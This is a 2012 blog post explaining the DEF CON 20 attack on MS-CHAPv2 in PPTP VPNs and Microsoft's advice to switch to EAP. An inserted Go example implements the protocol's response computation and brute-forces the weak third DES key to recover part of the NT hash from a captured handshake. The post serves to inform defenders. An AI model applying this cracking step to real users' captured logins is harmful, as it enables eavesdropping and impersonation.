Tuesday, August 28, 2012

Is your VPN secure? The answer might surprise you!

During DEF CON 20 a new attack against the MS-CHAP 2 protocol was announced that reduces the work of cracking an MS-CHAP login to a single 56-bit DES brute-force search. The presenters paired this with a new service on the CloudCracker site that will run this DES search for you in less than 24 hours.

The input required is a network capture of the MS-CHAP 2 handshake. For now there are a few manual steps, but they shouldn't be beyond anybody with a basic understanding of networking and command line tools. The payoff is huge, though: once you have the cracked token you can both listen in on any subsequent traffic from the authenticated user and authenticate as that user yourself.
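To show where that reduction comes from, here is the RFC 2759 NT-Response computation in Go, written as an added example (it is not code from the post or from the DEF CON talk): the capture supplies the two challenges, the user name and the 24-byte response; the third DES key is only two bytes of NT hash plus five zero bytes, and the first two keys encrypt the same plaintext, so one 2^56 sweep tests both. Challenge and hash values used when exercising it are constructed, not captured.

```go
package main

import (
	"crypto/des"
	"crypto/sha1"
	"encoding/binary"
)

// challengeHash is RFC 2759 section 8.2: SHA-1(PeerChallenge || AuthChallenge || UserName)[:8].
func challengeHash(peer, auth [16]byte, user string) (out [8]byte) {
	sum := sha1.Sum(append(append(peer[:], auth[:]...), user...))
	copy(out[:], sum[:8])
	return
}

// desBlock DES-encrypts chal under a 7-byte key, expanded to 8 bytes with (ignored) parity bits.
func desBlock(key7 []byte, chal [8]byte) (out [8]byte) {
	bits := binary.BigEndian.Uint64(append([]byte{0}, key7...))
	var key8 [8]byte
	for i := 7; i >= 0; i-- {
		key8[i], bits = byte(bits&0x7f)<<1, bits>>7
	}
	c, _ := des.NewCipher(key8[:]) // key is always 8 bytes, so err is nil
	c.Encrypt(out[:], chal[:])
	return
}

// ntResponse is RFC 2759 section 8.5: the NT hash, zero-padded to 21 bytes, is split into three
// 7-byte DES keys; key 3 is two hash bytes plus five zeros, so it has only 2^16 possible values.
func ntResponse(ntHash [16]byte, chal [8]byte) (resp [24]byte) {
	padded := append(ntHash[:], make([]byte, 5)...) // 16 hash bytes + 5 zero bytes
	for i := 0; i < 3; i++ {
		blk := desBlock(padded[i*7:i*7+7], chal)
		copy(resp[i*8:], blk[:])
	}
	return
}

// hashTailTrials recovers the two NT hash bytes behind response block 3 in at most 65536 trials.
func hashTailTrials(chal, block3 [8]byte) (tail [2]byte, ok bool) {
	key := make([]byte, 7) // bytes 2..6 stay zero, exactly as the protocol pads them
	for i := 0; i < 1<<16; i++ {
		key[0], key[1] = byte(i>>8), byte(i)
		if desBlock(key, chal) == block3 {
			return [2]byte{key[0], key[1]}, true
		}
	}
	return
}
```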

MS-CHAP 2 authentication is currently used in almost all PPTP VPN deployments (it is usually the default). It is also common in enterprise WiFi authentication, but there the handshake is already protected inside a TLS tunnel, so the attack is usually not possible in that setting.

Microsoft has put out a security advisory (although they are by no means the only affected vendor) advising everybody to switch to EAP authentication for PPTP. However, the change is not an easy one, since it needs to be configured on both the client and the server side of the VPN tunnel.
